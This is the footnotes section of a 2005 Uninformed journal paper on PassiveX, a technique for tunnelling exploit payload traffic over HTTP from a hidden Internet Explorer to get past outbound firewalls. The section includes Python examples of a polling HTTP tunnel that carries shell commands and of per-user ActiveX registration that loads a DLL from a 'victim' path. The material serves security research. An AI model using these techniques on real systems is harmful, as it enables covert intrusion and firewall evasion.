Uninformed: Informative Information for the Uninformed

Vol 1» 2005.May


Footnote 2.1 (to "... interpreter"):
There are other classes of post-exploitation payloads, but these two are the most prominent. Findsock-style payloads are excluded from this discussion because they are vulnerability-dependent and therefore not as universal as the two commonly used payloads.
Footnote 2.2 (to "... succeeded"):
In some cases it is possible to rebind to the port of the service being exploited (on Windows, by setting SO_REUSEADDR on the new socket before binding). That technique is outside the scope of this document.
Footnote 2.3 (to "... action"):
An example of this is ZoneAlarm's outbound filter, which prompts the user when an application attempts to make a connection so that the user can decide whether the connection should be allowed.
Footnote 2.4 (to "... filters"):
The second most likely, in the author's opinion, is DNS.
Footnote 3.1 (to "... traffic"):
It is possible to make use of HTTP chunked transfer encoding to stream data over a single long-lived request; however, such traffic is easier for an outbound filter to flag as malicious and cannot always be relied upon to work when passing through HTTP proxies.
Footnote 3.2 (to "... fashion"):
This, as fate would have it, aligns well with this paper's intention of creating an HTTP tunnel in the context of a trusted process.
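The polling-style tunnel that footnotes 3.1 and 3.2 contrast with chunked streaming, as an added illustration (this is not PassiveX's code, and the endpoint paths, the session header and the framing are assumptions made for the example). The client stands in for code running inside the trusted browser process: it pushes outbound bytes in a POST body and collects inbound bytes from the body of a GET response, so every message on the wire is an ordinary, Content-Length'd HTTP/1.1 request with no Transfer-Encoding for a proxy to reassemble or a filter to single out. The server keeps one pair of byte buffers per session. All traffic is constructed in memory so the example runs offline.

```python
import collections

# Assumed endpoints and session header for this illustration; they are not
# the paths or framing PassiveX itself uses.
TUNNEL_OUT = "/tunnel_out"    # POST body carries bytes from client to server
TUNNEL_IN = "/tunnel_in"      # GET response body carries bytes server to client
SESSION_HEADER = "X-Session"  # distinguishes concurrent tunnels at the server


def wire_request(method, path, headers, body=b""):
    """Render one request as it appears on the wire: a plain HTTP/1.1 message
    with a Content-Length and no Transfer-Encoding, i.e. nothing a proxy has
    to reassemble and nothing an outbound filter can single out as streaming."""
    hdrs = dict(headers)
    hdrs["Content-Length"] = str(len(body))
    head = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return ("\r\n".join(head) + "\r\n\r\n").encode("ascii") + body


class TunnelServer:
    """Server side: a pair of byte buffers per session. Data for the client
    waits in 'outbound' until the next poll; data from the client lands in
    'inbound' for whatever the server feeds it to (a shell, a socket, ...)."""

    def __init__(self):
        self.inbound = collections.defaultdict(bytearray)
        self.outbound = collections.defaultdict(bytearray)

    def queue_for_client(self, session, data):
        self.outbound[session] += data

    def take_from_client(self, session):
        data = bytes(self.inbound[session])
        self.inbound[session].clear()
        return data

    def handle(self, method, path, headers, body):
        """Dispatch one request; returns (status, response body)."""
        session = headers.get(SESSION_HEADER)
        if not session:
            return 400, b""
        if method == "POST" and path == TUNNEL_OUT:
            self.inbound[session] += body
            return 200, b""
        if method == "GET" and path == TUNNEL_IN:
            data = bytes(self.outbound[session])   # empty body when idle
            self.outbound[session].clear()
            return 200, data
        return 404, b""


class TunnelClient:
    """Client side, standing in for code running inside the trusted browser
    process. Each call is one complete request/response pair."""

    def __init__(self, server, session, host="www.example.com"):
        self.server, self.session, self.host = server, session, host
        self.log = []  # wire form of every request sent, for inspection

    def _request(self, method, path, body=b""):
        # The User-Agent is constructed here; a real tunnel inherits the browser's.
        headers = {"Host": self.host, SESSION_HEADER: self.session,
                   "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"}
        self.log.append(wire_request(method, path, headers, body))
        status, data = self.server.handle(method, path, headers, body)
        if status != 200:
            raise RuntimeError(f"tunnel request failed: {status}")
        return data

    def send(self, data):
        self._request("POST", TUNNEL_OUT, data)

    def poll(self):
        return self._request("GET", TUNNEL_IN)


def demo():
    """Round trip on constructed data; returns what each side received."""
    server = TunnelServer()
    client = TunnelClient(server, session="7f3a")
    assert client.poll() == b""                    # idle poll: nothing queued yet
    client.send(b"hello from inside the trusted process")
    server.queue_for_client("7f3a", b"echo hi\r\n")
    received = client.poll()
    sent = server.take_from_client("7f3a")
    return received, sent, client.log


if __name__ == "__main__":
    received, sent, log = demo()
    print(received, sent)
    print(log[1].decode("ascii", "replace"))
```

The cost of this design is latency: inbound data only moves on the next poll, so a real client trades a polling interval against the amount of otherwise-idle GET traffic it generates, whereas a chunked response would deliver it immediately at the price of looking like a stream.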
Footnote 3.3 (to "... manually"):
The control would have to be registered under the user-specific classes key (HKEY_CURRENT_USER\Software\Classes) rather than the machine-wide classes key (HKEY_LOCAL_MACHINE\Software\Classes, the two being merged into HKEY_CLASSES_ROOT) in order to avoid permission problems.
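The registry layout such a per-user registration needs, as an added example (not PassiveX's own registration code). The CLSID, ProgID, DLL path and control name are placeholders; the safe-for-scripting/initialising component categories are an optional extra for pages that must instantiate the control without relaxed zone settings. Everything is built relative to HKEY_CURRENT_USER so that no key touches HKEY_LOCAL_MACHINE; the .reg rendering runs anywhere, while the winreg writer is Windows-only and therefore imports lazily.

```python
from collections import OrderedDict

# Placeholder identifiers for this example (not PassiveX's CLSID, ProgID or path).
CLSID = "{12345678-1234-1234-1234-123456789ABC}"
PROGID = "Example.TunnelControl.1"
DLL_PATH = r"C:\Users\victim\AppData\Local\Temp\control.dll"

# The per-user half of the HKEY_CLASSES_ROOT merged view; writable without admin rights.
CLASSES = r"Software\Classes"
# Component categories Internet Explorer consults before scripting/initialising a control.
CATID_SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
CATID_SAFE_FOR_INITIALIZING = "{7DD95802-9882-11CF-9FA9-00AA006C42C4}"


def key(*parts):
    return "\\".join(parts)


def per_user_registration(clsid=CLSID, progid=PROGID, dll_path=DLL_PATH,
                          name="Example Control", mark_safe=False):
    """Build the keys an in-process ActiveX control needs, all relative to
    HKEY_CURRENT_USER. Returns {subkey: {value name: data}}; '' is (Default).
    Parents precede children, so the layout applies in order and removes in reverse."""
    clsid_key = key(CLASSES, "CLSID", clsid)
    reg = OrderedDict()
    reg[clsid_key] = {"": name}
    # COM loads the DLL named here into the calling process (in-proc server).
    reg[key(clsid_key, "InprocServer32")] = {"": dll_path, "ThreadingModel": "Apartment"}
    reg[key(clsid_key, "ProgID")] = {"": progid}
    reg[key(clsid_key, "Control")] = {}  # presence of this key marks an ActiveX control
    reg[key(CLASSES, progid)] = {"": name}
    reg[key(CLASSES, progid, "CLSID")] = {"": clsid}
    if mark_safe:
        # Optional: declare the control safe so a page can create and script it.
        reg[key(clsid_key, "Implemented Categories")] = {}
        for catid in (CATID_SAFE_FOR_SCRIPTING, CATID_SAFE_FOR_INITIALIZING):
            reg[key(clsid_key, "Implemented Categories", catid)] = {}
    return reg


def to_reg_file(reg, hive="HKEY_CURRENT_USER"):
    """Render the layout as a .reg file (importable with regedit /s file.reg)."""
    def quote(s):
        return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'
    out = ["Windows Registry Editor Version 5.00", ""]
    for subkey, values in reg.items():
        out.append(f"[{hive}\\{subkey}]")
        for name, data in values.items():
            out.append(("@" if name == "" else quote(name)) + "=" + quote(data))
        out.append("")
    return "\n".join(out)


def apply_registration(reg, remove=False):
    """Write (or delete) the keys under HKCU with winreg. Windows only, hence
    the deferred import; on other platforms this raises ImportError."""
    import winreg
    if remove:
        for subkey in reversed(list(reg)):  # children before parents
            winreg.DeleteKey(winreg.HKEY_CURRENT_USER, subkey)
        return
    for subkey, values in reg.items():
        with winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, subkey, 0, winreg.KEY_WRITE) as h:
            for name, data in values.items():
                winreg.SetValueEx(h, name, 0, winreg.REG_SZ, data)


if __name__ == "__main__":
    print(to_reg_file(per_user_registration(mark_safe=True)))
```

Because HKEY_CURRENT_USER\Software\Classes takes precedence over the machine-wide key in the merged view, a per-user entry also shadows an existing CLSID for that user, which is why defenders treat writes under this key as worth auditing. Note that from Windows Vista onwards a process running elevated ignores per-user COM registrations; that does not affect the non-elevated Internet Explorer case discussed here.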
Footnote 3.4 (to "... PassiveX"):
Though PassiveX has been used for other projects, it seemed only fitting to use it for this one as well.
Footnote 3.5 (to "... same"):
This code has potential issues under certain locales, depending on whether its assumptions about code paths and ASCII drive letters hold.
Footnote 3.6 (to "... Library)"):
ATL was picked over MFC because MFC is either less portable without CAB'ing its dependencies (when dynamically linked against the MFC DLLs) or much larger (when statically linked against the MFC libraries).
Footnote 3.7 (to "... interface"):
This was tested with ZoneAlarm 5.5.062.011.
Footnote 3.8 (to "... Explorer"):
Reference code can be found in the Metasploit Framework.
Footnote 3.9 (to "... settings"):
The API also allows the programmer to explicitly ignore the pre-cached settings if so desired.
Footnote 5.1 (to "... functional"):
There have been rumors of decisions to make it impossible to execute a hidden Internet Explorer, though no concrete information has been posted at the time of this writing.
Footnote 5.2 (to "... program"):
Most firewall products for NT-based versions of Windows are implemented as NDIS intermediate drivers, since such drivers provide the lowest level of supported filtering.